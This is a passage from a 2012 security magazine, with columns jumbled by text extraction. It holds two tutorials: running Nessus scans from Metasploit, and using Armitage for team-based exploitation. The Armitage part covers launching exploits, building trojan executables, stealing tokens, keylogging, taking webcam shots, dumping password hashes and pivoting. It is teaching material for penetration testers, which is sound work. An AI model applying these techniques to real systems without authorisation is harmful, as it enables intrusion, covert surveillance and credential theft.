uct-overview for download and installation instruc-
tions. Ill wait while you install it, and dont forget to
register your installation so you can download the
latest plugins for it.

To download Nessus vulnerability scanner go to Figure 1. Registering Nessus

36 09/2012
Configuring good idea unless you know why you get the warn-
First you need to register for a feed, which is how ing and the implications of it).
you get updated plugins very much like an antivi-
rus gets updated definitions. For home user there Using Metasploit Framework and Nessus
is a free personal feed and for organizations and together
security professionals there is a professional feed Scanning the local network
which is very affordable (at the time of writing it is Lets scan the local network for vulnerable systems
USD$1200 per year, which makes it USD$100 per (Figure 3).
month). If your organization cant afford that then After filling out the required information you can
you are in serious trouble. start the scan. Time to grab some coffee... De-
Once you got your feed registration it is time to pending on the size of the target network the scan
register Nessus (Figure 1). process can take anything from a few minutes to
hours... (Figure 4).
# nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX Once the scan is finished you can browse the
report and download it so you can import it into
Finally create a user for Nessus: Figure 2 and Metasploit (Figure 5).
Listing 1.
Manually importing Nessus results into
Running Nessus Metasploit
Start Nessus by running Once you have a Nessus report you can download
it in .nessus XML format (recommended) and im-
# /etc/init.d/nessusd start port it using db_import command: Listing 2.

You can access the Nessus console by going to

https://<ip address>:8834/. You will be presented
with a certificate warning because the SSL-cer-
tificate is self-signed. Click through the warning
message to access the console (generally not a

Listing 1. Create a user for Nessus

# nessus-adduser
Login : msf
Password :
Password (again) :
Do you want this user to be a Nessus admin
user ? (can upload plugins , etc...) (y/n) [n]: y

Figure 3. Scanning the local network for vulnerable systems

Figure 2. Create a user for Nessus Figure 4. The span of time needed to scan with Nessus

www.hakin9.org/en 37
msf> db_import /path/to/report.nessus Load Nessus plugin
In Metasploit you start with loading the nessus plu-
But that means that you need to run the scan first gin:
the scan and then import it to Metasploit...
msf> load nessus
Run Nessus from within Metasploit Framework
A much cooler feature is to run the vulnerability and then connect to the Nessus installation
scan directly from your Metasploit console, using
the information you already collected about the tar- Connect Metasploit to Nessus server
get network. Listing 3.

Listing 2. Importing a Nessus report msf> nessus_connect user:password@localhost:8834 ok

msf> db_import If you save the credentials using

Usage: db_import <filename> [file2...]
Filenames can be globs like *.xml, or **/*.xml msf> nessus_save
which will search recursively
Currently supported file types include: Listing 3. Connecting Metasploit to Nessus server
Acunetix XML
Amap Log msf> nessus_connect -h
Amap Log -m [*] You must do this before any other commands.
Appscan XML [*] Usage:
Burp Session XML [*] nessus_connect username:password@
Foundstone XML hostname:port <ssl ok>
IP360 ASPL [*] Example:> nessus_connect
IP360 XML v3 msf:msf@ ok
Microsoft Baseline Security Analyzer [*] OR
Nessus NBE [*] nessus_connect username@
Nessus XML (v1 and v2) hostname:port <ssl ok>
NetSparker XML [*] Example:> nessus_connect
NeXpose Simple XML msf@ ok
NeXpose XML Report [*] OR
Nmap XML [*] nessus_connect hostname:port <ssl
OpenVAS Report ok>
Qualys Asset XML [*] Example:> nessus_connect
Qualys Scan XML ok
Retina XML [*] OR
[*] nessus_connect
[*] Example:> nessus_connect
[*] This only works after you have saved creds
with nessus_save
[*] username and password are the ones you use
to login to the nessus web
front end
[*] hostname can be an ip address or a dns
name of the web front end.

[*] The ok on the end is important. It is a

way of letting you
[*] know that nessus used a self signed cert
and the risk that presents.

Figure 5. Browsing and downloading the report

38 09/2012
You only need to issue
Listing 4. Selecting a policy
msf> nessus_connect
msf> nessus_policy_list
[+] Nessus Policy List to automatically connect to your Nessus instance.
[+] Be warned, your Nessus credentials are stored in
the clear in ~/.msf4/nessus.yaml but it saves on
[+] ID Name Comments typing...
-- ---- --------
-1 Web App Tests Configuring Nessus from Metasploit
-2 Internal Network Scan After you have connected to the Nessus scan it is
-3 Prepare for PCI DSS audits time to scan the target. First we need to select a
-4 External Network Scan policy: Listing 4.
Unfortunatly, you cant create Nessus scan poli-
Listing 5. Starting the scan cies from the Metasploit plugin and you are forced
to use the flash-based web GUI. This shouldnt
msf> nessus_scan_new -h be a big problem as creating policies is done far
[*] Usage: less often than performing vulnerability scans with
[*] nessus_scan_new <policy id> <scan them.
name> <targets>
[*] Example:> nessus_scan_new 1 My Scan Scan with Nessus from within Metasploit Then we need to start the scan: Listing 5.
[*] Creates a scan based on a policy id and msf> nessus_scan_new -4 Metasploit Scan
[*] use nessus_policy_list to list all
available policies Importing the Nessus results into Metasploit
Once the scan is completed it is time to import the
Listing 6. Importing the scans results into Metasploit result into Metasploit (Listing 6.)
After which it is time to check what we now know
msf> nessus_report_list about our target network using the hosts, servic-
msf> nessus_report_get -h es and vulns commands in the Metasploit con-
[*] Usage: sole.
[*] nessus_report_get <report id>
[*] Example:> nessus_report_get f0eabba3- Final thoughts
4065-7d54-5763- Integrating Nessus vulnerability scan into
f191e98eb0f7f9f33db7e75a06ca Metasploit has several positive effects, like using
[*] Metasploit as the central repository for the current
[*] This command pulls the provided report penetration test project and being able to share the
from the nessus server in the information between team members when used
nessusv2 format in conjunction with Armitage (thus allowing multi-
[*] and parses it the same way db_import_ player Metasploit).
nessus does. After it is
parsed it will be
[*] available to commands such as db_hosts, Michael Boman
db_vulns, db_services and Michael Boman is a penetration tester by
db_autopwn. day and a malware researcher by night.
[*] Use: nessus_report_list to obtain a list Michael has more than 10 years experi-
of report ids ence in security testing of applications and
infrastructure. He also deliver courses in
msf> nessus_report_get f0eabba3- security testing and secure development.
4065-7d54-5763- Michael is passionate about computer security and doing
f191e98eb0f7f9f33db7e75a06ca his best so that more people do it right from start. You can
find him at his website http://michaelboman.org where
he tries to share his experiences whenever he can.

www.hakin9.org/en 39

How to Use Multiplayer

Metasploit with Armitage

Metasploit is a very cool tool to use in your penetration testing: add

Armitage for a really good time. Penetration test engagements are
more and more often a collaborative effort with teams of talented
security practitioners rather than a solo effort.

rmitage is a scriptable red team (that is what the virtual machine (or physical machine) at least
the offensive security teams are called) col- 1.5GB of RAM to your BackTrack 5 R3 team serv-
laboration tool for Metasploit that visualiz- er.
es targets, recommends exploits, and exposes the
advanced post-exploitation features in the frame- What you will learn
work. After reading this article you should know how to
Through one Metasploit/Armitage Server in- run a Armitage server and have several clients
stance, your team can: connected to it for multiplayer Metasploit, meaning
running red teams with more than a single member
Use the same sessions on the same Metasploit server.
Share hosts, captured data, and downloaded
files Installation
Communicate through a shared event log (very I will base this article on BackTrack 5 R3, so get
similar to a IRC chat if you are familiar with that from http://www.backtrack-linux.org/. After
those) you have downloaded and booted it you need to
Run bots to automate red team tasks start with connecting it to the network and update
Metasploit Framework. The default username/
What you should know password for BackTrack 5 is root / toor(root
To get the most of this article you should have a spelled backwards).
working (and preferably updated) BackTrack 5 R3
system, 32-bit or 64-bit shouldnt matter but I per- Update BackTrack and Metasploit
sonally run a 32-bit system in a virtual machine. Before we begin we should update BackTrack to
This article makes extensive use of the com- get the latest fixes by running
mand line so you should preferably be familiar with
that. You should also have a workstation that can # apt-get update
run the Armitage java GUI, which either can be the # apt-get dist-upgrade
BackTrack computer in X-windows or a separate
computer running Linux, OSX or Windows which We should also update the Metasploit Framework
can reach the BackTrack machine via the network. by running
Armitages red team collaboration setup is CPU
sensitive and it likes RAM. Make sure you give # msfupdate

40 09/2012
Listing 1a. Updating the Metasploit Framework

#! /bin/sh
# Provides: armitage-teamserver
# Required-Start:
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Armitage TeamServer
# Description: Armitage TeamServer for true Multiplayer Metasploit

# Author: Michael Boman <michael@michaelboman.org>


DESC=Armitage TeamServer
DAEMON_ARGS= MySecretPassword

# Exit if the package is not installed

[ -x $DAEMON ] || exit 0

# Read configuration variable file if it is present

[ -r /etc/default/$NAME ] && . /etc/default/$NAME

# Load the VERBOSE setting and other rcS variables

. /lib/init/vars.sh

# Define LSB log_* functions.

# Depend on lsb-base (>= 3.0-6) to ensure that this file is present.
. /lib/lsb/init-functions

# Function that starts the daemon/service
# Return
# 0 if daemon has been started
# 1 if daemon was already running
# 2 if daemon could not be started
start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --chdir $ARMITAGE_DIR --test
> /dev/null \
|| return 1
start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --chdir

www.hakin9.org/en 41
Listing 1b. Updating the Metasploit Framework
|| return 2

# Function that stops the daemon/service
# Return
# 0 if daemon has been stopped
# 1 if daemon was already stopped
# 2 if daemon could not be stopped
# other if a failure occurred
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE --name $NAME
[ $RETVAL = 2 ] && return 2
# Wait for children to finish too if this is a daemon that forks
# and if the daemon is only ever run from this initscript.
# If the above conditions are not satisfied then add some other code
# that waits for the process to drop all resources that could be
# needed by services started subsequently. A last resort is to
# sleep for some time.
start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 --exec $DAEMON
[ $? = 2 ] && return 2
# Many daemons dont delete their pidfiles when they exit.
rm -f $PIDFILE
return $RETVAL

# Function that sends a SIGHUP to the daemon/service
do_reload() {
# If the daemon can reload its configuration without
# restarting (for example, when it is sent a SIGHUP),
# then implement that here.
start-stop-daemon --stop --signal 1 --quiet --pidfile $PIDFILE --name $NAME
return 0

case $1 in
[ $VERBOSE != no ] && log_daemon_msg Starting $DESC $NAME
case $? in
0|1) [ $VERBOSE != no ] && log_end_msg 0 ;;
2) [ $VERBOSE != no ] && log_end_msg 1 ;;


42 09/2012
Listing 1c. Updating the Metasploit Framework
[ $VERBOSE != no ] && log_daemon_msg Stopping $DESC $NAME
case $? in
0|1) [ $VERBOSE != no ] && log_end_msg 0 ;;
2) [ $VERBOSE != no ] && log_end_msg 1 ;;
status_of_proc $DAEMON $NAME && exit 0 || exit $?
# If do_reload() is not implemented then leave this commented out
# and leave force-reload as an alias for restart.
#log_daemon_msg Reloading $DESC $NAME
#log_end_msg $?
# If the reload option is implemented then remove the
# force-reload alias
log_daemon_msg Restarting $DESC $NAME
case $? in
case $? in
0) log_end_msg 0 ;;
1) log_end_msg 1 ;; # Old process is still running
*) log_end_msg 1 ;; # Failed to start
# Failed to stop
log_end_msg 1
echo Usage: $SCRIPTNAME {start|stop|status|restart|force-reload} >&2
exit 3

www.hakin9.org/en 43
Once that is done we are ready to get Armitage Start Armitage server automatically at boot
running. Add the Armitage to automatically start at boot with
the following command:
Configuring Armitage
Before you can use Armitage you need to config- # update-rc.d armitage-teamserver defaults
ure it and make sure it is running (and create start-
up-scripts so it is always started when the system Using Armitage
boots up). Connecting Armitage client to the Server.
To begin with we need a shared secret (also known
as a password) that is the gatekeeper between your Using Armitage GUI
Armitage server and its clients. Anyone who knows The Armitage GUI has three main panels: modules
this password can access your server and access (top to the left), targets (top to the right) and tabs
the results your have collected, including active (bottom), which can be resized to your liking.
sessions. Take care when choosing this password,
although for this article I will chose a password that Modules
is not considered secure but is easy to read. The module browser lets you launch a Metasploit
auxiliary module, throw an exploit, generate a pay-
Manually start Armitage Teamserver load, and run a post-exploitation module. Click
To manually start Armitage Teamserver you first through the tree to find the desired module. Dou-
need to move to the Armitage directory which is ble-click the module to open a module launch dia-
(in BackTrack 5 R3) /opt/metasploit/msf3/data/ log.
armitage by running: Armitage will configure the module to run against
the selected hosts. This works for auxiliary mod-
# cd /opt/metasploit/msf3/data/armitage ules, exploits, and post modules.
Running a module against multiple hosts is one
And then to start the Armitage Teamserver you of the big advantages of Armitage. In the Metasploit
need to run ./teamserver <my-ip-address> console, you must configure and launch an exploit
<password> like this: and post modules for each host youre working
with while in the Armitage GUI most of the module
# ./teamserver MySecretPassword settings are already populated.
You can search modules too. Click in the search
Creating start-up scripts for Armitage box below the tree, type a wildcard expression
To start the Armitage Team Server for true multi- (e.g., ssh_*), and press enter. The module tree will
player Metasploit you need to create a startup show the search results, expanded for quick view-
script. As of this moment the correct way to start ing. Clear the search box and press enter to re-
a Armitage team server on BackTrack 5 R3 is like store the module browser to its original state.
this: Listing 1.
Targets Graph View
The targets panel shows your targets to you. Ar-
mitage represents each target as a computer with
its IP address and other information about it below

Figure 1. Armitage client connection window Figure 2. Description of the Armitage user interface

44 09/2012
the computer. The computer screen shows the op- Table View to switch to this mode. Armitage will re-
erating system the computer is running (Figure 2). member your preference (Figure 3).
A red computer with electrical jolts indicates a Click any of the table headers to sort the hosts.
compromised host. Highlight a row and right-click it to bring up a menu
A directional green line indicates a pivot from one with options for that host.
host to another. Pivoting allows Metasploit to route Armitage will highlight the IP address of any host
attacks and scans through intermediate hosts. A with sessions. If a pivot is in use, Armitage will
bright green line indicates the pivot communication make it bold as well.
path is in use.
Click a host to select it. You may select multiple Tabs
hosts by clicking and dragging a box over the de- Armitage opens each dialog, console, and table in
sired hosts. a tab below the module and target panels. Click
Right-click a host to bring up a menu with avail- the X button to close a tab.
able options. The attached menu will show attack You may right-click the X button to open a tab in
and login options, menus for existing sessions, a window, take a screenshot of a tab, or close all
and options to edit the host information. tabs with the same name (Figure 4).
The login menu is only available after a port scan Hold shift and click X to close all tabs with the
reveals open ports that Metasploit can use. The same name. Hold shift + control and click X to
Attack menu is only available after finding attacks open the tab in its own window.
through the Attacks menu at the top of Armitage. You may drag and drop tabs to change their or-
Shell and Meterpreter menus show up when a der.
shell or Meterpreter session exists on the selected Armitage provides several keyboard shortcuts to
host. make your tab management experience as enjoy-
Several keyboard shortcuts are available in the able as possible. Use Ctrl+T to take a screenshot
targets panel. To edit these, go to Armitage -> Pref- of the active tab. Use Ctrl+D to close the active
erences. tab. Try Ctrl+Left and Ctrl+Right to quickly switch
tabs. And Ctrl+W to open the current tab in its own
Ctrl Plus zoom in window.
Ctrl Minus zoom out
Ctrl 0 reset the zoom level Consoles
Ctrl A select all hosts Metasploit console, Meterpreter console, and shell
Escape clear selection interfaces each use a console tab. A console tab
Ctrl C arrange hosts into a circle lets you interact with these interfaces through Ar-
Ctrl S arrange hosts into a stack mitage.
Ctrl H arrange hosts into a hierarchy. This The console tab tracks your command history.
only works when a pivot is set up. Use the up arrow to cycle through previously typed
Ctrl P export hosts into an image commands. The down arrow moves back to the
last command you typed.
Right-click the target area with no selected hosts In the Metasploit console, use the Tab key to
to configure the layout and zoom level of the tar- complete commands and parameters. This works
get area. just like the Metasploit console outside of Armit-
Targets Table View Use Ctrl Plus to make the console font size larg-
If you have a lot of hosts, the graph view becomes er, Ctrl Minus to make it smaller, and Ctrl 0 to re-
difficult to work with. For this situation Armitage has set it. This change is local to the current console
a table view. Go to Armitage -> Set Target View -> only. Visit Armitage -> Preferences to permanently
change the font.
Press Ctrl F to show a panel that will let you
search for text within the console.

Figure 3. Your preferences stored in Armitage Figure 4. Tabs management

46 09/2012
Use Ctrl A to select all text in the consoles buf- Export Data
fer. Armitage sends a use or a set PAYLOAD com- Armitage and Metasploit share a database to track
mand if you click a module or a payload name in your hosts, services, vulnerabilities, credentials,
a console. loots, and user-agent strings captured by browser
To open a Console go to View -> Console or exploit modules.
press Ctrl+N. To get this data, go to View -> Reporting -> Export
On MacOS X and Windows, you must click in the Data. This option will export data from Metasploit
edit box at the bottom of the console to type. Linux and create easily parsable XML and tab separated
doesnt have this problem. Always remember, the value (TSV) files.
best Armitage experience is on Linux.
The Armitage console uses color to draw your at- Host Management
tention to some information. To disable the colors, Dynamic Workspaces
set the console.show_colors.boolean preference Armitages dynamic workspaces feature allows
to false. You may also edit the colors through Ar- you to create views into the hosts database and
mitage -> Preferences. Here is the Armitage color quickly switch between them. Use Workspaces
palette and the preference associated with each -> Manage to manage your dynamic workspaces.
color: Figure 5. Here you may add, edit and remove workspaces
you create (Figure 6).
Logging To create a new dynamic workspace, press Add.
Armitage logs all console, shell, and event log out- You will see the following dialog: Figure 7.
put for you. Armitage organizes these logs by date Give your dynamic workspace a name. It doesnt
and host. Youll find these logs in the ~/.armitage matter what you call it. This description is for you.
folder. Go to View -> Reporting -> Acitivity Logs to If youd like to limit your workspace to hosts from
open this folder. a certain network, type a network description in
Armitage also saves copies of screenshots and the Hosts field. A network description might be:
webcam shots to this folder. to display hosts between
Change the armitage log_everything boolean Separate multiple networks with a
preference key to false to disable this feature. comma and a space.
Edit the armitage log_data_here folder to set the
folder where Armitage should log everything to.

Figure 6. Managing your dynamic workspaces

Figure 5. Armitage color palette Figure 7. Creating a new dynamic workspace

www.hakin9.org/en 47
You can cheat with the network descriptions a You may manually add hosts with Hosts -> Add
little. If you type:, Armitage will as- Hosts.
sume you mean If you type:, Armitage will assume you mean NMap Scans You may also launch an NMap scan from Armitage
Fill out the Ports field to include hosts with cer- and automatically import the results into Metasploit.
tain services. Separate multiple ports using a com- The Hosts ->NMap Scan menu has several scan-
ma and a space. ning options.
Use the OS field to specify which operating sys- Optionally, you may type db_nmap in a console
tem youd like to see in this workspace. You may to launch NMap with the options you choose.
type a partial name, such as indows. Armitage NMap scans do not use the pivots you have set up.
will only include hosts whose OS name includes
the partial name. This value is not case sensitive. MSF Scans
Separate multiple operating systems with a com- Armitage bundles several Metasploit scans into
ma and a space. one feature called MSF Scans. This feature will
Select Hosts with sessions only to only include scan for a handful of open ports. It then enumer-
hosts with sessions in this dynamic workspace. ates several common services using Metasploit
You may specify any combination of these items auxiliary modules built for the purpose.
when you create your dynamic workspace. Highlight one or more hosts, right-click, and click
Each workspace will have an item in the Work- Scan to launch this feature. You may also go to
spaces menu. Use these menu items to switch Hosts -> MSF Scans to launch these as well.
between workspaces. You may also use Ctrl+1 These scans work through a pivot and against
through Ctrl+9 to switch between your first nine IPv6 hosts as well. These scans do not attempt to
workspaces. discover if a host is alive before scanning. To save
Use Workspaces -> Show All or Ctrl+Backspace time, you should do host discovery first (e.g. an
to display the entire database. ARP scan, ping sweep, or DNS enumeration) and
Armitage will only display 512 hosts at any given then launch these scans to enumerate the discov-
time, no matter how many hosts are in the data- ered hosts.
base. If you have thousands of hosts, use this fea-
ture to segment your hosts into useful target sets. DNS Enumeration
Another host discovery option is to enumerate a
Importing Hosts DNS server. Go to Hosts -> DNS Enum to do this.
To add host information to Metasploit, you may im- Armitage will present a module launcher dialog
port it. The Hosts -> Import Hosts menu accepts with several options. You will need to set the DO-
the following files: MAIN option to the domain you want to enumerate.
You may also want to set NS to the IP address of
Acunetix XML the DNS server youre enumerating.
Amap Log If youre attacking an IPv6 network, DNS enu-
Amap Log -m meration is one option to discover the IPv6 hosts
Appscan XML on the network.
Burp Session XML
Foundstone XML Database Maintenance
IP360 ASPL Metasploit logs everything you do to a database.
IP360 XML v3 Over time your database will become full of stuff.
Microsoft Baseline Security Analyzer If you have a performance problem with Armitage,
Nessus NBE try clearing your database. To do this, go to Hosts
Nessus XML (v1 and v2) -> Clear Database.
NetSparker XML
NeXpose Simple XML Exploitation
NeXpose XML Report Remote Exploits
Nmap XML Before you can attack, you must choose your
OpenVAS Report weapon. Armitage makes this process easy. Use
Qualys Asset XML Attacks -> Find Attacks to generate a custom At-
Qualys Scan XML tack menu for each host. To exploit a host: right-
Retina XML click it, navigate to Attack, and choose an exploit.

48 09/2012
To show the right attacks, make sure the operating The exploit launch dialog lets you configure op-
system is set for the host. tions for a module and choose whether to use a
The Attack menu limits itself to exploits that meet reverse connect payload.
a minimum exploit rank of great. Some useful ex- Armitage presents options in a table. Double-click
ploits are ranked good and they wont show in the the value to edit it. If an option requires a filename,
attack menu. You can launch these using the mod- double-click the option to open up a file chooser di-
ule browser. alog. You may also check Show advanced options
Use Armitage -> Set Exploit Rank to change the to view and set advanced options.
minimum exploit rank. If you see SOMETHING + in a table, this means
Optionally, if youd like to see hosts that are vul- you can double-click that item to launch a dialog to
nerable to a certain exploit, browse to the exploit in help you configure its value. This convention applies
the module browser. Right-click the module. Select to the module launcher and preferences dialogs.
Relevant Targets. Armitage will create a dynamic Some penetration testers organize their targets
workspace that shows hosts that match the high- into text files to make them easier to track. Armit-
lighted exploit. Highlight all of the hosts and double- age can make use of these files too. Double-click
click the exploit module to attack all of them at once. RHOST + and select your targets file. The file must
contain one IP address per line. This is an easy
Which exploit? way to launch an attack or action against all of
Learning which exploits to use and when comes those hosts.
with experience. Some exploits in Metasploit im- For remote exploits, Armitage chooses your pay-
plement a check function. These check functions load for you. Generally, Armitage will use Meter-
connect to a host and check if the exploit applies. preter for Windows targets and a command shell
Armitage can use these check functions to help payload for UNIX targets.
you choose the right exploit when there are many Click Launch to run the exploit. If the exploit is
options. For example, targets listening on port 80 successful, Armitage will make the host red and
will show several web application exploits after you surround it with lightning bolts. Metasploit will also
use Find Attacks. Click the Check exploits menu print a message to any open consoles.
to run the check command against each of these.
Once all the checks are complete, press Ctrl F and Automatic Exploitation
search for vulnerable hosts. This will lead you to If manual exploitation fails, you have the hail mary
the right exploit (Figure 8). option. Attacks -> Hail Mary launches this feature.
Clicking a host and selecting Services is another Armitages Hail Mary feature is a smart db_autop-
way to find an exploit. If you have NMap scan re- wn. It finds exploits relevant to your targets, filters
sults, look at the information field and guess which the exploits using known information, and then
server software is in use. Use the module brows- sorts them into an optimal order.
er to search for any Metasploit modules related to This feature wont find every possible shell, but
that software. One module may help you find infor- its a good option if you dont know what else to try.
mation required by another exploit. Apache Tom-
cat is an example of this. The tomcat_mgr_login Client-side Exploits
module will search for a username and password Through Armitage, you may use Metasploits cli-
that you can use. Once you have this, you can ent-side exploits. A client-side attack is one that at-
launch the tomcat_mgr_deploy exploit to get a shell
on the host.

Launching Exploits
Armitage uses this dialog to launch exploits: Fig-
ure 9.

Figure 8. Finding the right exploit Figure 9. Launching exploits

www.hakin9.org/en 49
tacks an application and not a remote service. If Payload Handlers
you cant get a remote exploit to work, youll have A payload handler is a server that runs in Metasploit.
to use a client-side attack. Its job is to wait for a payload to connect to your
Use the module browser to find and launch cli- Metasploit and establish a session.
ent-side exploits. Search for fileformat to find ex- To quickly start a payload handler, navigate to
ploits that trigger when a user opens a malicious Armitage -> Listeners. A bind listener attempts to
file. Search for browser to find exploits that serv- connect to a payload listening for a connection. A
er browser attacks from a web server built into reverse listener waits for the payload to connect
Metasploit. back to you.
You may set up shell listeners to receive connec-
Client-side Exploits and Payloads tions from netcat.
If you launch an individual client-side exploit, you Go to View -> Jobs to see which handlers are
have the option of customizing the payload that running.
goes with it. Armitage picks same defaults for you.
In a penetration test, its usually easy to get Generate a Payload
someone to run your evil package. The hard part is Exploits are great, but dont ignore the simple stuff.
to get past network devices that limit outgoing traf- If you can get a target to run a program, then all
fic. For these situations, it helps to know about me- you need is an executable. Armitage can generate
terpreters payload communication options. There an executable from any of Metasploits payloads.
are payloads that speak HTTP, HTTPS, and even Choose a payload in the module browser, double-
communicate to IPv6 hosts. These payloads give click it, select the type of output, and set your op-
you options in a tough egress situation. tions. Once you click launch, a save dialog will ask
To set the payload, double-click PAYLOAD in the you where to save the file to (Figure 11).
option column of the module launcher. This will To create a Windows trojan binary, set the output
open a dialog asking you to choose a payload (Fig- type to exe. Set the Template option to a Windows
ure 10). executable. Set KeepTemplateWorking if youd
Highlight a payload and click Select. Armitage will like the template executable to continue to work
update the PAYLOAD, DisablePayloadHandler, as normal. Make sure you test the resulting binary.
ExitOnSession,LHOST, and LPORT values for Some template executables will not yield a work-
you. Youre welcome to edit these values as you ing executable.
see fit. Remember, if you have a payload, it needs a
If you select the Start a handler for this pay- handler. Use the multi/handler output type to cre-
load option, Armitage will set the payload options ate a handler that waits for the payload to connect.
to launch a payload handler when the exploit This option offers more flexibility and payload op-
launches. If you did not select this value, youre tions than the Armitage ->Listeners menu.
responsible for setting up a multi/handler for the If you plan to start a handler and then generate a
payload. payload, heres a tip that will save you some time.
First, configure a multi/handler as described. Hold
down Shift when you click Launch. This will tell Ar-

Figure 10. Choosing a payload Figure 11. Saving the file

50 09/2012

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(Script Kiddies need not apply)
mitage to keep the module launch dialog open. to save the user the trouble of retyping their pass-
Once your handler is started, change the output word when they try to access different resources.
type to the desired value, and click Launch again. Tokens persist until a reboot. You may steal these
This will generate the payload with the same val- tokens to assume the rights of that user.
ues used to create the multi/handler. To see which tokens are available to you, go to
Meterpreter N -> Access -> Steal Token. Armitage
Post Exploitation will present a list of tokens to you. Click Steal To-
Managing Sessions ken to steal one.
Armitage makes it easy to manage the meterpreter If you want to revert to your original token, press
agent once you successfully exploit a host. Hosts Revert to Self. The Get UID button shows your cur-
running a meterpreter payload will have a Meter- rent user ID.
preter N menu for each Meterpreter session (Fig-
ure 12). Session Passing
If you have shell access to a host, you will see Once you exploit a host, duplicating your access
a Shell N menu for each shell session. Right-click should be a first priority. Meterpreter N -> Access
the host to access this menu. If you have a Win- -> Pass Session will inject meterpreter into mem-
dows shell session, you may go to Shell N -> Me- ory and execute it for you. By default this option is
terpreter to upgrade the session to a Meterpreter configured to call back to Armitages default Meter-
session. If you have a UNIX shell, go to Shell N -> preter listener. Just click Launch.
Upload to upload a file using the UNIX printf com- You may also use Pass Session to send Meter-
mand. preter to a friend. Set LPORT and LHOST to the
values of their Meterpreter multi/handler.
Privilege Escalation If your friend uses Armitage, have them type
Some exploits result in administrative access to set in a Console tab and report the LHOST and
the host. Other times, you need to escalate privi- LPORT values to you. These are the values for
leges yourself. To do this, use the Meterpreter N -> their default Meterpreter listener.
Access -> Escalate Privileges menu. This will high-
light the privilege escalation modules in the mod- File Browser
ule browser. Meterpreter gives you several options for explor-
Try the getsystem post module against Windows ing a host once youve exploited it. One of them is
XP/2003 era hosts. the file browser. This tool will let you upload, down-
load, and delete files. Visit Meterpreter N -> Ex-
Token Stealing plore -> Browse Files to access the File Browser.
Another privilege escalation option is token steal- Right-click a file to download or delete it. If you
ing. When a user logs onto a Windows host, a to- want to delete a directory, make sure its empty first.
ken is generated and acts like a temporary cookie You may download entire folders or individu-
al files. Go to View -> Downloads to access your
downloaded files.
If you have system privileges, you may modify
the file timestamps using the File Browser. Right-
click a file or directory and go to the Timestamp
menu. This features works like a clipboard. Use
Get MACE Values to capture the timestamps of
the current file. Right-click another file and use Set
MACE Values to update the timestamps of that file.

Command Shell
You can reach a command shell for a host through
Meterpreter N -> Interact -> Command Shell. The
Meterpreter shell is also available under the same
parent menu.
Navigating to the Meterpreter N menu for each
action gets old fast. Right-click inside the Meter-
preter shell window to see the Meterpreter N menu
Figure 12. Meterpreter menu items right away.

52 09/2012
Close the command shell tab to kill the process to Meterpreter N ->Explore -> Post Modules or
associated with the command shell. Shell N -> Post Modules. Clicking this menu item
will show all applicable post modules in the mod-
VNC ule browser.
To interact with a desktop on a target host, go to Metasploit saves post-exploitation data into a
Meterpreter N -> Interact -> Desktop (VNC). This Loot database. To view this data go to View -> Loot.
will stage a VNC server into the memory of the You may highlight multiple hosts and Armit-
current process and tunnel the connection through age will attempt to run the selected post module
Meterpreter. Armitage will provide you the details against all of them. Armitage will open a new tab
to connect a local VNC client to your target. for the post module output of each session. This
may lead to a lot of tabs. Hold down shift and click
Screenshots and Webcam Spying X on one of the tabs to close all tabs with the same
To grab a screenshot use Meterpreter N -> Explore name.
-> Screenshot. There is a Webcam Shot option in
the same location. This option snaps a frame from Maneuver
the users webcam. Pivoting
Right-click a screenshot or webcam shot image Metasploit can launch attacks from a compromised
to change the zoom for the tab. This zoom prefer- host and receive sessions on the same host. This
ence will stay, even if you refresh the image. Click ability is called pivoting.
Refresh to update the screenshot or grab another To create a pivot, go to Meterpreter N -> Pivoting
frame from the webcam. ClickWatch (10s) to auto- -> Setup.... A dialog will ask you to choose which
matically snap a picture every ten seconds. subnet you want to pivot through the session.
Once youve set up pivoting, Armitage will draw
Process Management and Key Logging a green line from the pivot host to all targets reach-
Go to Meterpreter N -> Explore -> Show Process- able by the pivot you created. The line will become
es to see a list of processes on your victim. Use Kill bright green when the pivot is in use.
to kill the highlighted processes. To use a pivot host for a reverse connection, set
Meterpreter runs in memory. Its possible to move the LHOST option in the exploit launch dialog to
Meterpreter from one process to another. This is the IP address of the pivot host.
called migration. Highlight a process and click Mi-
grate to migrate to another process. Your session Scanning and External Tools
will have the permissions of that process. Once you accessed a host, its good to explore and
While in a process, its also possible to see key- see what else is on the same network. If youve set
strokes from the vantage point of that process. up pivoting, Metasploit will tunnel TCP connections
Highlight a process and click Log Keystrokes to to eligible hosts through the pivot host. These con-
launch a module that migrates meterpreter and nections must come from Metasploit.
starts capturing keystrokes. If you key log from To find hosts on the same network as a compro-
explorer.exe you will see all of the keys the user mised host, right-click the compromised host and
types on their desktop. go to Meterpreter N-> ARP Scan or Ping Sweep.
If you choose to migrate a process for the pur- This will show you which hosts are alive. Highlight
pose of key logging, you should duplicate your the hosts that appear, right-click, and select Scan
session first. If the process Meterpreter lives in to scan these hosts using Armitages MSF Scan
closes, your session will go away. feature. These scans will honor the pivot you set
Post-exploitation Modules External tools (e.g., nmap) will not use the pivots
Metasploit has several post-exploitation mod- youve set up. You may use your pivots with exter-
ules too. Navigate the post branch in the mod- nal tools through a SOCKS proxy though. Go to
ule browser. Double-click a module and Armitage Armitage -> SOCKS Proxy... to launch the SOCKS
will show a launch dialog. Armitage will populate proxy server.
the modules SESSION variable if a compromised The SOCKS4 proxy server is one of the most
host is highlighted. Each post-exploitation module useful features in Metasploit. Launch this option
will execute in its own tab and present its output and you can set up your web browser to con-
to you there. nect to websites through Metasploit. This allows
To find out which post modules apply for a ses- you to browse internal sites on a network like
sion: right-click a compromised host and navigate youre local. You may also configure proxychains

www.hakin9.org/en 53
on Linux to use almost any program through a password combination from one service may give
proxy pivot. you access to another host that you couldnt ex-
Password Hashes
To collect Windows password hashes, visit Meter- Password Brute Force
preter N -> Access -> Dump Hashes. You need ad- Metasploit can attempt to guess a username and
ministrative privileges to do this. password for a service for you. This capability is
There are two hash dumping options. One is the easy to use through the module browser.
lsass method and the other is the registry method. Metasploit supports brute forcing through the
The lsass method attempts to grab the password auxiliary modules named service_login. Type login
hashes from memory. This option works well against in the module browser to search for them.
Windows XP/2003 era hosts. The registry method To brute force a username and password over
works well against modern Windows systems. SSH, browse to auxiliary/scanner/ssh/ssh_login in
